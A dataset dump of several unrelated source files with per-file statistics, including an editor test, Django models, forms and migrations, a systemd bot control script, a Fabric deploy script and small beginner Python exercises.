            self.displayCheck(0, 0, [
                u" ci . ",
                u" ",
                u" 1 ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u"New buffer | 1, 1 | 0%, 0%",
                u" ",
            ]),
            self.resizeScreen(10, 36),
            self.displayCheck(0, 0, [
                u" ci . ",
                u" ",
                u" 1 ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" 1, 1 | 0%, 0%",
                u" ",
            ]),
            CTRL_Q])

    def test_prediction(self):
        #self.setMovieMode(True)
        self.runWithTestFile(kTestFile, [
            self.displayCheck(-1, 0, [u" "]),
            #CTRL_P, self.displayCheck(-1, 0, ["p: "]), CTRL_J,
            self.displayCheck(-1, 0, [u" "]),
            #CTRL_P, self.displayCheck(-1, 0, ["p: "]), CTRL_J,
            CTRL_Q])

    def test_text_contents(self):
        self.runWithTestFile(kTestFile, [
            self.displayCheck(2, 7, [u" "]), u't', u'e', u'x', u't',
            self.displayCheck(2, 7, [u"text "]), CTRL_Q, u'n'])

    def test_session(self):
        self.runWithTestFile(kTestFile, [
            self.displayCheck(0, 0, [
                u" ci . ",
                u" ",
                u" 1 ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u"New buffer | 1, 1 | 0%, 0%",
                u" "]),
            u'H', u'e', u'l', u'l', u'o',
            self.displayCheck(0, 0, [
                u" ci * ",
                u" ",
                u" 1 Hello ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" 1, 6 | 0%,100%",
                u" "]),
            CTRL_Z,
            self.displayCheck(0, 0, [
                u" ci . ",
                u" ",
                u" 1 ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" ",
                u" 1, 1 | 0%, 0%",
                u" "]),
            CTRL_Q])
| 42.938202 | 78 | 0.262201 | 505 | 7,643 | 3.869307 | 0.30099 | 0.064483 | 0.07523 | 0.088025 | 0.385875 | 0.317298 | 0.281986 | 0.281986 | 0.281986 | 0.221085 | 0 | 0.029024 | 0.652885 | 7,643 | 177 | 79 | 43.180791 | 0.707501 | 0.10925 | 0 | 0.713287 | 0 | 0 | 0.511566 | 0.006925 | 0 | 0 | 0 | 0 | 0.006993 | 1 | 0.048951 | false | 0.006993 | 0.076923 | 0 | 0.132867 | 0.006993 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
94f729a1144cc5dd93cf60e93b0a3fdad3d0e094 | 144 | py | Python | backend_rest/users/choices.py | ezrankayamba/twiga_expodocs | 39303f137f3761e7024e1e0e1a6449f4187e30e9 | [
"MIT"
] | null | null | null | backend_rest/users/choices.py | ezrankayamba/twiga_expodocs | 39303f137f3761e7024e1e0e1a6449f4187e30e9 | [
"MIT"
] | 13 | 2020-02-21T13:58:18.000Z | 2022-03-12T00:16:26.000Z | backend_rest/users/choices.py | ezrankayamba/twiga_expodocs | 39303f137f3761e7024e1e0e1a6449f4187e30e9 | [
"MIT"
] | null | null | null | PRIVILEGE_CHOICES = [
    ('Users.manageUser', 'Manage Users'),
    ('Sales.manage', 'Manage Sales'),
    ('Sales.docs', 'Manage Documents'),
]
| 24 | 41 | 0.618056 | 14 | 144 | 6.285714 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173611 | 144 | 5 | 42 | 28.8 | 0.739496 | 0 | 0 | 0 | 0 | 0 | 0.541667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
94f73fe49b60fa653297683ac3a27ea41b414c2a | 63 | py | Python | python/debugging/__init__.py | mxdzi/hackerrank | 4455f73e4479a4204b2e1167253f6a02351aa5b7 | [
"MIT"
] | null | null | null | python/debugging/__init__.py | mxdzi/hackerrank | 4455f73e4479a4204b2e1167253f6a02351aa5b7 | [
"MIT"
] | null | null | null | python/debugging/__init__.py | mxdzi/hackerrank | 4455f73e4479a4204b2e1167253f6a02351aa5b7 | [
"MIT"
] | null | null | null | __all__ = [
    'q1_words_score',
    'q2_default_arguments',
]
| 12.6 | 26 | 0.650794 | 7 | 63 | 4.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040816 | 0.222222 | 63 | 4 | 27 | 15.75 | 0.632653 | 0 | 0 | 0 | 0 | 0 | 0.539683 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a2069eb52e37dfa86efa3244c3eed7f14c22db1c | 1,012 | py | Python | bot/setupbot.py | iorenml/tiktok_bot | 84a316c4d28b2803fd747b1e6aafe20c4f0c4f58 | [
"MIT"
] | null | null | null | bot/setupbot.py | iorenml/tiktok_bot | 84a316c4d28b2803fd747b1e6aafe20c4f0c4f58 | [
"MIT"
] | null | null | null | bot/setupbot.py | iorenml/tiktok_bot | 84a316c4d28b2803fd747b1e6aafe20c4f0c4f58 | [
"MIT"
] | null | null | null | #!/usr/bin/python3.9
import os
import shutil

import click


@click.group()
def cli_start():
    pass


@cli_start.command()
def start():
    # install the new service unit file
    shutil.copy("/usr/local/bin/ttbot/ttbot.service",
                "/etc/systemd/system/ttbot.service")
    # enable and start the service
    os.system('systemctl daemon-reload')
    os.system('systemctl enable ttbot')
    os.system('systemctl start ttbot')
    click.echo('Bot is ON')


@click.group()
def cli_stop():
    pass


@cli_stop.command()
def stop():
    # disable and stop the service
    os.system('systemctl disable ttbot')
    os.system('systemctl stop ttbot')
    click.echo('Bot is OFF')


@click.group()
def cli_status():
    pass


@cli_status.command()
def status():
    os.system('systemctl status ttbot')


@click.group()
def cli_info():
    pass


@cli_info.command()
def info():
    click.echo('The script is working')


test = click.CommandCollection(sources=[cli_start, cli_stop, cli_status, cli_info])

if __name__ == '__main__':
    test()
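One weakness of the script above is that `os.system` silently ignores failures: if `systemctl enable` fails, `systemctl start` still runs. `subprocess.run(cmd, check=True)` stops at the first failing step instead. A sketch that separates command construction (easy to test) from execution — the `ttbot` unit name comes from the script, while the helper functions themselves are illustrative:

```python
import subprocess


def systemctl_commands(action, unit='ttbot'):
    """Build the systemctl invocations the start/stop commands shell out to."""
    if action == 'start':
        return [['systemctl', 'daemon-reload'],
                ['systemctl', 'enable', unit],
                ['systemctl', 'start', unit]]
    if action == 'stop':
        return [['systemctl', 'disable', unit],
                ['systemctl', 'stop', unit]]
    raise ValueError('unsupported action: %s' % action)


def run_all(commands):
    for cmd in commands:
        # raises CalledProcessError (and aborts the sequence) on failure
        subprocess.run(cmd, check=True)
```

Passing argument lists rather than shell strings also avoids quoting issues if the unit name ever contains special characters.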
| 15.569231 | 83 | 0.666008 | 131 | 1,012 | 4.992366 | 0.351145 | 0.073395 | 0.155963 | 0.097859 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002436 | 0.188735 | 1,012 | 64 | 84 | 15.8125 | 0.794153 | 0.071146 | 0 | 0.216216 | 0 | 0 | 0.260684 | 0.071581 | 0 | 0 | 0 | 0 | 0 | 1 | 0.216216 | false | 0.108108 | 0.081081 | 0 | 0.297297 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
a211fe2950cb229c71949f12d1c4a23b8e6e92fc | 1,667 | py | Python | ana/piecewise2.py | hanswenzel/opticks | b75b5929b6cf36a5eedeffb3031af2920f75f9f0 | [
"Apache-2.0"
] | 11 | 2020-07-05T02:39:32.000Z | 2022-03-20T18:52:44.000Z | ana/piecewise2.py | hanswenzel/opticks | b75b5929b6cf36a5eedeffb3031af2920f75f9f0 | [
"Apache-2.0"
] | null | null | null | ana/piecewise2.py | hanswenzel/opticks | b75b5929b6cf36a5eedeffb3031af2920f75f9f0 | [
"Apache-2.0"
] | 4 | 2020-09-03T20:36:32.000Z | 2022-01-19T07:42:21.000Z | #!/usr/bin/env python
"""
Hmm, maybe it's impossible to get anywhere with the integral without first fixing the BetaInverse
In [22]: pw.subs(b, 1.55)
Out[22]: Piecewise((Max(0, 0.542862145685886*e - 3.9544951109741), (e > 7.294) & (e < 7.75)), (0, True))
In [23]: pw.subs(b, 1.)
Out[23]: Piecewise((Max(0, 0.225957188630962*e - 1.06222481205998), (e > 7.294) & (e < 7.75)), (0, True))
"""
import numpy as np
import sympy as sym
ri = np.array([
[ 1.55 , 1.478],
[ 1.795, 1.48 ],
[ 2.105, 1.484],
[ 2.271, 1.486],
[ 2.551, 1.492],
[ 2.845, 1.496],
[ 3.064, 1.499],
[ 4.133, 1.526],
[ 6.2 , 1.619],
[ 6.526, 1.618],
[ 6.889, 1.527],
[ 7.294, 1.554],
[ 7.75 , 1.793],
[ 8.267, 1.783],
[ 8.857, 1.664],
[ 9.538, 1.554],
[10.33 , 1.454],
[15.5 , 1.454]
])
if __name__ == '__main__':
    e, b = sym.symbols("e b")
    i = 11
    e0, r0 = ri[i]
    e1, r1 = ri[i+1]
    em = (e0 + e1)/2.
    v0 = ( 1 - b/r0 ) * ( 1 + b/r0 )
    v1 = ( 1 - b/r1 ) * ( 1 + b/r1 )
    fr = (e-e0)/(e1-e0)
    pt = ( sym.Max(v0*(1-fr) + v1*fr, 0), (e > e0) & (e < e1) )
    ot = (0, True)
    pw = sym.Piecewise( pt, ot )
    v = pw.subs(b, 1.55).subs(e, em)
    print(v)
| 24.514706 | 193 | 0.34973 | 225 | 1,667 | 2.555556 | 0.453333 | 0.013913 | 0.036522 | 0.041739 | 0.083478 | 0.048696 | 0.048696 | 0.048696 | 0 | 0 | 0 | 0.298746 | 0.473905 | 1,667 | 67 | 194 | 24.880597 | 0.356899 | 0.428314 | 0 | 0 | 0 | 0 | 0.011715 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.055556 | 0.027778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
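The sympy expression interpolates v(e) = (1 - b/r)(1 + b/r) = 1 - (b/r)² linearly between two bin edges and clamps it at zero. The same evaluation in plain Python (a hypothetical helper, not in the original script):

```python
def piecewise_v(e, b, e0, r0, e1, r1):
    # Zero outside the open interval (e0, e1), matching the Piecewise default.
    if not (e0 < e < e1):
        return 0.0
    v0 = 1.0 - (b / r0) ** 2  # (1 - b/r)(1 + b/r) expanded
    v1 = 1.0 - (b / r1) ** 2
    fr = (e - e0) / (e1 - e0)  # linear interpolation fraction
    return max(v0 * (1.0 - fr) + v1 * fr, 0.0)
```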
a217ee46e4f42794bce4b2ee9426a900a6fb52db | 2,144 | py | Python | blog/migrations/0029_auto_20210114_1514.py | SaeedTJF/FaraPy-1 | 31fbfd1ec10fd78a167ddc476ace7ed5eceee538 | [
"BSD-3-Clause"
] | 1 | 2021-06-09T08:02:05.000Z | 2021-06-09T08:02:05.000Z | blog/migrations/0029_auto_20210114_1514.py | SaeedTJF/FaraPy-1 | 31fbfd1ec10fd78a167ddc476ace7ed5eceee538 | [
"BSD-3-Clause"
] | null | null | null | blog/migrations/0029_auto_20210114_1514.py | SaeedTJF/FaraPy-1 | 31fbfd1ec10fd78a167ddc476ace7ed5eceee538 | [
"BSD-3-Clause"
] | 1 | 2021-06-03T17:40:59.000Z | 2021-06-03T17:40:59.000Z | # Generated by Django 3.0.3 on 2021-01-14 11:44
import datetime

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('blog', '0028_auto_20210114_1449'),
    ]

    operations = [
        migrations.AlterField(
            model_name='comment',
            name='status',
            field=models.IntegerField(choices=[(1, 'Confirmed'), (0, 'Not confirmed')], default=0, verbose_name='Status'),
        ),
        migrations.AlterField(
            model_name='menu',
            name='status',
            field=models.IntegerField(choices=[(1, 'Secondry Menu'), (0, 'Primary Menu')], default=0, verbose_name='Status'),
        ),
        migrations.AlterField(
            model_name='portable',
            name='sex',
            field=models.IntegerField(choices=[(0, 'Female'), (1, 'Male')], default=1, verbose_name='Sex'),
        ),
        migrations.AlterField(
            model_name='submenu',
            name='status',
            field=models.IntegerField(choices=[(0, 'Category'), (2, 'Page'), (1, 'Address')], default=0, verbose_name='Status'),
        ),
        migrations.AlterField(
            model_name='task_manegar',
            name='created_time',
            field=models.DateField(default=datetime.datetime(2021, 1, 14, 15, 14, 50, 776080), null=True, verbose_name='Start date'),
        ),
        migrations.AlterField(
            model_name='task_manegar',
            name='end_time',
            field=models.DateField(default=datetime.datetime(2021, 1, 14, 15, 14, 50, 776080), null=True, verbose_name='Finish date'),
        ),
        migrations.AlterField(
            model_name='task_manegar',
            name='status',
            field=models.IntegerField(choices=[(3, 'Done!'), (0, 'To Do'), (1, 'In progress')], default=0, verbose_name='Status'),
        ),
        migrations.AlterField(
            model_name='time',
            name='status',
            field=models.IntegerField(choices=[(1, 'Out of Duty'), (0, 'On Duty')], default=0, verbose_name='Status'),
        ),
    ]
| 38.981818 | 135 | 0.555504 | 220 | 2,144 | 5.304545 | 0.331818 | 0.08569 | 0.17138 | 0.1988 | 0.645244 | 0.596401 | 0.531277 | 0.413025 | 0.330763 | 0.145673 | 0 | 0.05863 | 0.291978 | 2,144 | 54 | 136 | 39.703704 | 0.710145 | 0.020989 | 0 | 0.5 | 1 | 0 | 0.154185 | 0.011258 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041667 | 0 | 0.104167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
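The `DateField` defaults above carry frozen timestamps (`datetime.datetime(2021, 1, 14, 15, 14, 50, 776080)`), which usually means the model passed a *called* `datetime.now()` instead of the callable itself, so the value was baked in when `makemigrations` ran. The difference, sketched in plain Python (names are illustrative):

```python
from datetime import datetime

frozen_default = datetime(2021, 1, 14, 15, 14, 50)  # evaluated once, baked in
deferred_default = datetime.now                     # no parentheses: stored as a callable


def resolve_default(default):
    # Django resolves field defaults the same way: call it if it is callable.
    return default() if callable(default) else default
```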
bf44d919e3e12ebd163751757b1927b22effdb5b | 336 | py | Python | Session3-Conditional-Statements-part2/01_day_of_week.py | elenaborisova/Crack-the-Code | d0b505ebad878d5228d98c934779ed9b28f6c034 | [
"MIT"
] | null | null | null | Session3-Conditional-Statements-part2/01_day_of_week.py | elenaborisova/Crack-the-Code | d0b505ebad878d5228d98c934779ed9b28f6c034 | [
"MIT"
] | null | null | null | Session3-Conditional-Statements-part2/01_day_of_week.py | elenaborisova/Crack-the-Code | d0b505ebad878d5228d98c934779ed9b28f6c034 | [
"MIT"
] | 1 | 2021-05-31T14:47:53.000Z | 2021-05-31T14:47:53.000Z | number = int(input())
if number == 1:
    print("Monday")
elif number == 2:
    print("Tuesday")
elif number == 3:
    print("Wednesday")
elif number == 4:
    print("Thursday")
elif number == 5:
    print("Friday")
elif number == 6:
    print("Saturday")
elif number == 7:
    print("Sunday")
else:
print("Error") | 18.666667 | 23 | 0.559524 | 41 | 336 | 4.585366 | 0.536585 | 0.319149 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02834 | 0.264881 | 336 | 18 | 24 | 18.666667 | 0.732794 | 0 | 0 | 0 | 0 | 0 | 0.171875 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.470588 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
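The if/elif ladder above can also be written as a dictionary lookup with a fallback — an alternative sketch, not the course's solution:

```python
DAYS = {
    1: "Monday", 2: "Tuesday", 3: "Wednesday", 4: "Thursday",
    5: "Friday", 6: "Saturday", 7: "Sunday",
}


def day_name(number):
    # dict.get supplies the "Error" branch of the original else clause
    return DAYS.get(number, "Error")
```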
bf65ea943def807250a2417b19ed661c9d41c5bf | 377 | py | Python | Mundo 1/ex002.py | judigunkel/judi-exercicios-python | c61bb75b1ae6141defcf42214194e141a70af15d | [
"MIT"
] | null | null | null | Mundo 1/ex002.py | judigunkel/judi-exercicios-python | c61bb75b1ae6141defcf42214194e141a70af15d | [
"MIT"
] | null | null | null | Mundo 1/ex002.py | judigunkel/judi-exercicios-python | c61bb75b1ae6141defcf42214194e141a70af15d | [
"MIT"
] | 1 | 2021-03-06T02:41:36.000Z | 2021-03-06T02:41:36.000Z | """
Write a program that reads a person's name and shows a welcome
message
"""
nome = input('Digite seu nome: ')  # ask the user for their name

# using str.format:
print('É um prazer te conhecer, {}{}{}!'.format('\033[4;34m', nome, '\033[m'))

# using an f-string:
print(f'É um prazer te conhecer, \033[4;34m{nome}\033[m!')

# the name is printed underlined and in color
| 29 | 78 | 0.679045 | 65 | 377 | 3.938462 | 0.615385 | 0.039063 | 0.070313 | 0.085938 | 0.265625 | 0.117188 | 0 | 0 | 0 | 0 | 0 | 0.057325 | 0.167109 | 377 | 12 | 79 | 31.416667 | 0.757962 | 0.493369 | 0 | 0 | 0 | 0 | 0.627778 | 0.127778 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
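The escape sequences used above are ANSI SGR codes: `\033[4;34m` turns on underline (4) and a blue foreground (34), and `\033[m` resets all attributes. A tiny helper sketch (names are made up):

```python
UNDERLINE_BLUE = "\033[4;34m"  # SGR: 4 = underline, 34 = blue foreground
RESET = "\033[m"               # SGR reset


def emphasize(text):
    # Wrap text in the style-on / style-off escape codes.
    return f"{UNDERLINE_BLUE}{text}{RESET}"
```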
bf77219984bd898368969d24dff7019402837592 | 1,159 | py | Python | fabfile.py | webadmin87/midnight | b60b3b257b4d633550b82a692f3ea3756c62a0a9 | [
"BSD-3-Clause"
] | 1 | 2015-11-20T12:42:39.000Z | 2015-11-20T12:42:39.000Z | fabfile.py | webadmin87/midnight | b60b3b257b4d633550b82a692f3ea3756c62a0a9 | [
"BSD-3-Clause"
] | 3 | 2020-02-11T21:21:12.000Z | 2021-06-10T17:23:56.000Z | fabfile.py | webadmin87/midnight | b60b3b257b4d633550b82a692f3ea3756c62a0a9 | [
"BSD-3-Clause"
] | 1 | 2015-11-04T09:23:31.000Z | 2015-11-04T09:23:31.000Z | from fabric.api import *
from contextlib import contextmanager
env.hosts = ['host_name']
env.user = 'user_name'
env.keyfile = ['$HOME/.ssh/private_key']
env.directory = '/path/to/project'
env.activate = 'source /path/to/virtualenv/bin/activate'
env.uwsgi_pid = '/tmp/project_name.pid'
env.target_env = 'prod'
@contextmanager
def virtualenv():
    with cd(env.directory):
        with prefix(env.activate):
            yield


def pull_data():
    with virtualenv():
        run('git pull origin master')
        run('cp -f midnight/env/%s/settings_local.py midnight/settings_local.py' % env.target_env)


def pip_install():
    with virtualenv():
        run('pip install -e .')


def bower_install():
    with virtualenv():
        run('bower install')


def collect_static():
    with virtualenv():
        run('./manage.py collectstatic --noinput')


def migrate():
    with virtualenv():
        run('./manage.py migrate')


def reload_uwsgi():
    run('uwsgi --reload ' + env.uwsgi_pid)


def deploy():
    execute(pull_data)
    execute(pip_install)
    execute(bower_install)
    execute(collect_static)
    execute(migrate)
    execute(reload_uwsgi)
| 20.333333 | 98 | 0.663503 | 147 | 1,159 | 5.095238 | 0.408163 | 0.093458 | 0.113485 | 0.064085 | 0.066756 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.197584 | 1,159 | 56 | 99 | 20.696429 | 0.805376 | 0 | 0 | 0.128205 | 0 | 0 | 0.264021 | 0.115617 | 0 | 0 | 0 | 0 | 0 | 1 | 0.205128 | true | 0 | 0.051282 | 0 | 0.25641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
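`deploy` is just an ordered pipeline of steps. The same pattern without Fabric, as a sketch (Fabric's `execute` also handles per-host routing, which this deliberately omits):

```python
def run_pipeline(steps):
    # Run each deployment step in order; any exception aborts the rest,
    # mirroring how a failed Fabric task stops the deploy.
    results = []
    for step in steps:
        results.append(step())
    return results
```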
bf8a699bf52b2b69a5bc0c7d94d9e3e334724f8e | 7,950 | py | Python | sysvet/apps/usuario/forms.py | joseiba/SysVetSoft | d1ed13799a5086c880bc45dd153d78bb3a629c7d | [
"Apache-2.0"
] | null | null | null | sysvet/apps/usuario/forms.py | joseiba/SysVetSoft | d1ed13799a5086c880bc45dd153d78bb3a629c7d | [
"Apache-2.0"
] | null | null | null | sysvet/apps/usuario/forms.py | joseiba/SysVetSoft | d1ed13799a5086c880bc45dd153d78bb3a629c7d | [
"Apache-2.0"
] | null | null | null | from django.contrib.auth.forms import AuthenticationForm, UserCreationForm, UserChangeForm, PasswordChangeForm
from django.contrib.auth.models import Group, Permission
from django.forms import *
from django import forms
from apps.usuario.models import User
class FormLogin(AuthenticationForm):
    def __init__(self, *args, **kwargs):
        super(FormLogin, self).__init__(*args, **kwargs)
        self.fields['username'].widget.attrs['class'] = 'input100'
        self.fields['username'].widget.attrs['placeholder'] = 'Nombre de usuario'
        self.fields['password'].widget.attrs['class'] = 'input100'
        self.fields['password'].widget.attrs['placeholder'] = 'Contraseña'
class UserForm(UserCreationForm):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.fields['password1'].widget.attrs['class'] = 'form-control'
        self.fields['password2'].widget.attrs['class'] = 'form-control'
        self.fields['groups'].widget.attrs['class'] = 'group_select'
        self.fields['groups'].widget.attrs['required'] = 'required'
        self.fields['groups'].widget.attrs['style'] = 'width: 100%'

    class Meta:
        model = User
        # "fiels" was a typo in the original; Django's ModelForm option is "fields".
        fields = ("first_name", "last_name", "email", "username", "groups", "password1", "password2")
        widgets = {
            'first_name': forms.TextInput(
                attrs={
                    'class': 'form-control', 'name': 'first_name', 'placeholder': 'Ingrese el nombre del usuario',
                    'onkeyup': 'replaceDirection(this)', 'required': 'required', 'autocomplete': "off"
                }
            ),
            'last_name': forms.TextInput(
                attrs={
                    'class': 'form-control', 'name': 'last_name', 'placeholder': 'Ingrese el apellido del usuario',
                    'onkeyup': 'replaceDirection(this)', 'required': 'required', 'autocomplete': "off"
                }
            ),
            'email': forms.TextInput(
                attrs={
                    'class': 'form-control optional', 'placeholder': 'Email', 'name': 'email',
                    'type': 'email', 'id': 'email', 'autocomplete': "off"
                }
            ),
            'username': forms.TextInput(
                attrs={
                    'class': 'form-control', 'name': 'username', 'placeholder': 'Nombre de usuario',
                    'onkeyup': 'replaceDirection(this)', 'required': 'required', 'autocomplete': "off"
                }
            ),
        }
        exclude = ['user_permissions', 'last_login', 'date_joined', 'is_superuser', 'is_active', 'is_staff', 'password', 'profile']
        help_texts = {
            'username': None,
            'email': None,
            'first_name': None,
            'last_name': None,
            'password1': None,
            'password2': None,
        }

    def save(self, commit=True):
        user = super().save(commit=False)
        if commit:
            user.save()
            for grupo in self.cleaned_data['groups']:
                user.groups.add(grupo)
        return user
class UserFormChange(UserChangeForm):
    def __init__(self, user, *args, **kwargs):
        self.user = user
        super().__init__(*args, **kwargs)
        self.fields['groups'].widget.attrs['class'] = 'group_select'
        self.fields['groups'].widget.attrs['required'] = 'required'
        self.fields['groups'].widget.attrs['style'] = 'width: 100%'
        for fieldname in ['username']:
            self.fields[fieldname].help_text = None
        try:
            if not self.user.has_perms(['usuario.add_user']):
                for fieldname in ['groups']:
                    self.fields[fieldname].widget.attrs['class'] = 'd-none'
                    self.fields[fieldname].label = ''
                    self.fields[fieldname].help_text = None
        except:
            pass

    password = None

    class Meta:
        model = User
        fields = ("first_name", "last_name", "email", "username", "groups")
        widgets = {
            'first_name': forms.TextInput(
                attrs={
                    'class': 'form-control', 'name': 'first_name', 'placeholder': 'Ingrese el nombre del usuario',
                    'onkeyup': 'replaceDirection(this)', 'required': 'required', 'autocomplete': "off"
                }
            ),
            'last_name': forms.TextInput(
                attrs={
                    'class': 'form-control', 'name': 'last_name', 'placeholder': 'Ingrese el apellido del usuario',
                    'onkeyup': 'replaceDirection(this)', 'required': 'required', 'autocomplete': "off"
                }
            ),
            'email': forms.TextInput(
                attrs={
                    'class': 'form-control optional', 'placeholder': 'Email', 'name': 'email',
                    'type': 'email', 'id': 'email', 'autocomplete': "off"
                }
            ),
            'username': forms.TextInput(
                attrs={
                    'class': 'form-control', 'name': 'username', 'placeholder': 'Nombre de usuario',
                    'onkeyup': 'replaceDirection(this)', 'required': 'required', 'autocomplete': "off"
                }
            ),
        }
        exclude = ['user_permissions', 'last_login', 'date_joined', 'is_superuser', 'is_active', 'is_staff', 'password', 'profile']
        help_texts = {
            'username': None,
            'email': None,
            'first_name': None,
            'last_name': None,
            'password': None,
        }

    def save(self, commit=True):
        form = super()
        if form.is_valid():
            user = form.save(commit=False)
            user.groups.clear()
            for grupo in self.cleaned_data['groups']:
                user.groups.add(grupo)
            return user
queryset = [
"user",
"producto",
"especie",
"raza",
"cliente",
"mascota",
"reserva",
"confiempresa",
"servicio",
"empleado",
"facturacompra",
"proveedor",
"pedidocabecera",
"facturacabeceraventa",
"inventario",
"tipovacuna",
"reporte"]
class GroupForm(ModelForm):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.fields['permissions'].queryset = Permission.objects.filter(content_type__model__in=queryset)

    class Meta:
        model = Group
        fields = ('name', 'permissions')
        widgets = {
            'name': forms.TextInput(attrs={
                'class': 'form-control', 'autocomplete': 'off',
            }),
            'permissions': forms.CheckboxSelectMultiple(),
        }
class GroupChangeForm(ModelForm):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.fields['permissions'].queryset = Permission.objects.filter(content_type__model__in=queryset)

    class Meta:
        model = Group
        fields = ('name', 'permissions')
        widgets = {
            'name': forms.TextInput(attrs={
                'class': 'form-control', 'autocomplete': 'off',
            }),
            'permissions': forms.CheckboxSelectMultiple(),
        }
class ContraseñaChangeForm(PasswordChangeForm):
    def __init__(self, user, *args, **kwargs):
        self.user = user
        super().__init__(user, *args, **kwargs)
        self.fields['old_password'].widget.attrs['class'] = 'form-control'
        self.fields['new_password1'].widget.attrs['class'] = 'form-control'
        self.fields['new_password2'].widget.attrs['class'] = 'form-control'
        self.fields['old_password'].widget.attrs['required'] = 'required'
        self.fields['new_password1'].widget.attrs['required'] = 'required'
        self.fields['new_password2'].widget.attrs['required'] = 'required'

    def clean_old_password(self):
        """
        Validate that the old_password field is correct.
        """
        old_password = self.cleaned_data["old_password"]
        if not self.user.check_password(old_password):
            raise ValidationError("La contraseña actual no coinciden!")
return old_password | 37.857143 | 194 | 0.562893 | 743 | 7,950 | 5.87214 | 0.193809 | 0.055008 | 0.048132 | 0.072198 | 0.725647 | 0.705478 | 0.641989 | 0.607151 | 0.557415 | 0.557415 | 0 | 0.003852 | 0.281635 | 7,950 | 210 | 195 | 37.857143 | 0.760112 | 0.006038 | 0 | 0.530726 | 0 | 0 | 0.279477 | 0.016753 | 0 | 0 | 0 | 0 | 0 | 1 | 0.050279 | false | 0.134078 | 0.027933 | 0 | 0.156425 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
